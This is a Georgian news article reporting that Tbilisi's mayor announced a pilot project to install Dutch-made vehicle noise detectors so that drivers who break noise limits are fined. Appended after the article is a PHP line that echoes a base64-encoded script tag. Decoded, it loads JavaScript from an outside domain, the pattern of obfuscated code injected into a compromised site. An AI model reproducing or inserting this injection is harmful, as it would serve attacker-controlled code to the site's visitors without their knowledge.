celsiusi
ავერსი შნაიდერი

 დედაქალაქში ავტომობილების ხმაურის დონის დამდგენი დეტექტორები დამონტაჟდება. საპილოტე პროგრამის განხორციელების შესახებ ინფორმაცია თბილისის მერმა, კახა კალაძემ დედაქალაქის მთავრობის სხდომაზე გააჟღერა.

კალაძეს არ დაუკონკრეტებია, როდიდან დამონტაჟდება დეტექტორები, თუმცა თქვა, რომ ისინი ჰოლანდიური კომპანიის მიერ იქნება დამზადებული და უკვე გატესტილია ევროპის სხვადასხვა ქალაქში.

„ბოლო პერიოდში ავტოსატრანსპორტო საშუალებების მხრიდან გახშირდა ხმაურისთვის დაწესებული ნორმების დარღვევა. განსაკუთრებით მძიმე მდგომარეობაა საღამოს და ღამის საათებში, რითაც წუხდება მოსახლეობა. ცხადია, რომ ღამით ადამიანები ისვენებენ. ხმაურიანი სატრანსპორტო საშუალებები დისკომფორტს უქმნიან ადამიანებს.

აღნიშნულიდან გამომდინარე, თბილისის მუნიციპალური სერვისების განვითარების სააგენტომ შს სამინისტროსთან ერთად დაიწყო ახალ საპილოტე პროექტზე მუშაობა, რომელიც ითვალისწინებს სატრანსპორტო საშუალების ხმაურის დონის დამდგენი დეტექტორების დაყენებას. ჩვენ აქტიურად ვთანამშრომლობთ შს სამინისტროსთან და ერთად განისაზღვრება კონკრეტული ადგილები, სადაც აღნიშნული დეტექტორები განთავსდება. გამოვლინდება ნორმის დამრღვევი სატრანსპორტო საშუალებები და დაჯარიმდება. დეტექტორები დამზადებულია ჰოლანდიური კომპანიის მიერ“, - განაცხადა კალაძემ.

240
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");